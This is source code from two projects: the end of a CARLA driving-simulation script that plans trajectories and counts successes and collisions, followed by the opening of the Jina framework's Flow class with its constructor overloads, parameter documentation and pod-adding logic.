destination.location = world.get_random_location_from_navigation()
global_plan_map, destination = replan(agent, destination, copy.deepcopy(origin_map), spawn_points)
sensor_dict = {
'camera':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
'callback':image_callback,
},
'camera:view':{
'transform':carla.Transform(carla.Location(x=-3.0, y=0.0, z=6.0), carla.Rotation(pitch=-45)),
'callback':view_image_callback,
},
'collision':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
'callback':collision_callback,
},
}
sm = SensorManager(world, blueprint, vehicle, sensor_dict)
sm.init_all()
# start to plan
plan_thread = threading.Thread(target = make_plan, args=())
while True:
if (global_img is not None) and (global_nav is not None):
plan_thread.start()
break
else:
time.sleep(0.001)
# wait for the first plan result
while not start_control:
time.sleep(0.001)
print('Start to control')
success_cnt = 0
fail_cnt = 0
ctrller = CapacController(world, vehicle, MAX_SPEED)
while True:
# change destination
if close2dest(vehicle, destination):
success_cnt += 1
print('Success:', success_cnt, '\tFail:', fail_cnt, '\t', 100*(success_cnt)/(success_cnt+fail_cnt))
print('Avg speed', sum(speed_list)/len(speed_list))
#destination = get_random_destination(spawn_points)
print('get destination !', time.time())
destination = carla.Transform()
destination.location = world.get_random_location_from_navigation()
global_plan_map, destination = replan(agent, destination, copy.deepcopy(origin_map), spawn_points)
if global_collision:
fail_cnt += 1
print('Success:', success_cnt, '\tFail:', fail_cnt, '\t', 100*(success_cnt)/(success_cnt+fail_cnt))
print('Avg speed', sum(speed_list)/len(speed_list))
cv2.imwrite('img_log/'+str(time.time())+'.png', copy.deepcopy(global_view_img))
start_point = random.choice(spawn_points)
vehicle.set_transform(start_point)
global_plan_map, destination = replan(agent, destination, copy.deepcopy(origin_map), spawn_points)
start_waypoint = agent._map.get_waypoint(agent._vehicle.get_location())
end_waypoint = agent._map.get_waypoint(destination.location)
route_trace = agent._trace_route(start_waypoint, end_waypoint)
start_point.rotation = route_trace[0][0].transform.rotation
vehicle.set_transform(start_point)
time.sleep(0.1)
global_collision = False
v = global_vehicle.get_velocity()
a = global_vehicle.get_acceleration()
global_vel = np.sqrt(v.x**2+v.y**2+v.z**2)
global_a = np.sqrt(a.x**2+a.y**2+a.z**2)
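# The trajectory produced by make_plan() covers t in [0, 0.99) at steps of args.dt (scaled by
# args.max_t seconds). Below, the wall-clock time elapsed since the plan was generated is mapped
# to an index into that trajectory (with a small lookahead offset of 2 samples); if the plan is
# older than the trajectory horizon, this control step is skipped until a fresh plan arrives.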
control_time = time.time()
dt = control_time - global_trajectory['time']
index = int((dt/args.max_t)//args.dt) + 2
if index > 0.99/args.dt:
continue
control = ctrller.run_step(global_trajectory, index, state0)
vehicle.apply_control(control)
speed_list.append(global_v0)
visualize(global_view_img, global_nav)
#time.sleep(1/60.)
cv2.destroyAllWindows()
sm.close_all()
vehicle.destroy()
if __name__ == '__main__':
main()
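# Runtime prerequisites implied by the code above (paths/versions are the ones hard-coded here):
# a CARLA 0.9.9.4 server reachable at config['host']:config['port'] with the Town01 map, the
# pretrained weights 'encoder.pth' and 'generator.pth' in the working directory, and ideally a
# CUDA device. Collision snapshots are written to img_log/, so that directory should exist
# beforehand (cv2.imwrite fails silently otherwise).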
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import Optional, Union, Tuple, List, Set, Dict, overload, Type, TYPE_CHECKING
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RoutingTableCyclicError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible, JAML
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import CompoundPod, Pod
from ..peapods.pods.factory import PodFactory
from ..types.routing.table import RoutingTable
from ..peapods.networking import is_remote_local_connection
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:  # imports needed only by static type checkers
from ..executors import BaseExecutor
from ..clients.base import BaseClient
from .asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
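# A minimal usage sketch (hedged: 'MyEncoder', 'MyIndexer' and `my_docs` are hypothetical and not
# part of this module). Entering the Flow as a context manager triggers build() and start(), and
# requests are then sent through the PostMixin interface:
#
#     f = (Flow(port_expose=45678)
#          .add(name='encoder', uses='MyEncoder', parallel=2)
#          .add(name='indexer', uses='MyIndexer', needs='encoder'))
#     with f:
#         f.post('/index', inputs=my_docs)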
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. Otherwise, these proxy variables are unset before starting. gRPC seems to prefer no proxy.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
connect_to_predecessor: Optional[bool] = False,
cors: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = True,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
port_ctrl: Optional[int] = None,
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
port_out: Optional[int] = None,
prefetch: Optional[int] = 50,
prefetch_on_recv: Optional[int] = 1,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCRuntime',
socket_in: Optional[str] = 'PULL_CONNECT',
socket_out: Optional[str] = 'PUSH_CONNECT',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `--compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing.
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatic docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside ZEDRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee successful execution of the sequel flow. If something
is wrong upstream, it is hard to carry this exception forward without any side-effect.
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_out: The port for output data, default a random port between [49152, 65535]
:param prefetch: The number of pre-fetched requests from the client
:param prefetch_on_recv: The number of additional requests to fetch on every receive
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. Otherwise, these proxy variables are unset before starting. gRPC seems to prefer no proxy.
:param py_modules: The customized Python modules that need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. Cannot be used in combination with external Pods.
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatic docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When used under Python, one can additionally use the following values:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
static_routing_table: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. Cannot be used in combination with external Pods.
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
base_cls = self.__class__
base_cls_name = self.__class__.__name__
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
self.__class__ = type(base_cls_name, (AsyncPostMixin, base_cls), {})
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
                    'the input/output of a Pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(self, needs, **kwargs):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.name
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all Peas defined in **needs** have completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all hanging Peas have completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connect_to_predecessor: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = False,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = None,
native: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
parallel: Optional[int] = 1,
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_ctrl: Optional[int] = None,
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
port_out: Optional[int] = None,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'ZEDRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
socket_in: Optional[str] = 'PULL_BIND',
socket_out: Optional[str] = 'PUSH_BIND',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing.
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in the Docker image. When not set, the Docker image ENTRYPOINT takes effect.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow. This Pod will not be context-managed by the Flow.
:param force: If set, always pull the latest Hub Executor bundle even if it already exists locally.
:param gpus: This argument allows a dockerized Jina Executor to discover local GPU devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display`
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param install_requirements: If set, install the `requirements.txt` of the Hub Executor bundle locally.
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside ZEDRuntime.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee successful execution of the sequel flow. If something
is wrong upstream, it is hard to carry this exception forward without any side-effect.
:param parallel: The number of parallel peas in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param peas_hosts: The hosts of the peas when parallel greater than 1.
Peas will be evenly distributed among the hosts. By default,
peas are running on host provided by the argument ``host``
:param polling: The polling strategy of the Pod (when `parallel>1`)
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param port_out: The port for output data, default a random port between [49152, 65535]
:param pull_latest: Pull the latest image before running
:param py_modules: The customized Python modules that need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. Cannot be used in combination with external Pods.
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only a flat structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When used under Python, one can additionally use the following values:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all parallels, accepted type follows `--uses`
:param uses_before: The executor attached before the Peas described by --uses, typically before sending to all parallels, accepted type follows `--uses`
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split is provided, then the basename of that directory will be mounted into the container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and return it; otherwise, modify in place
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'pod{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# grpc data runtime does not support sharding at the moment
if (
args.grpc_data_requests
and kwargs.get('shards') is not None
and kwargs.get('shards', 1) > 1
and self.args.infrastructure != InfrastructureType.K8S
):
raise NotImplementedError("GRPC data runtime does not support sharding")
if args.grpc_data_requests and args.runtime_cls == 'ZEDRuntime':
args.runtime_cls = 'GRPCDataRuntime'
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.k8s_namespace = self.args.name
op_flow._pod_nodes[pod_name] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
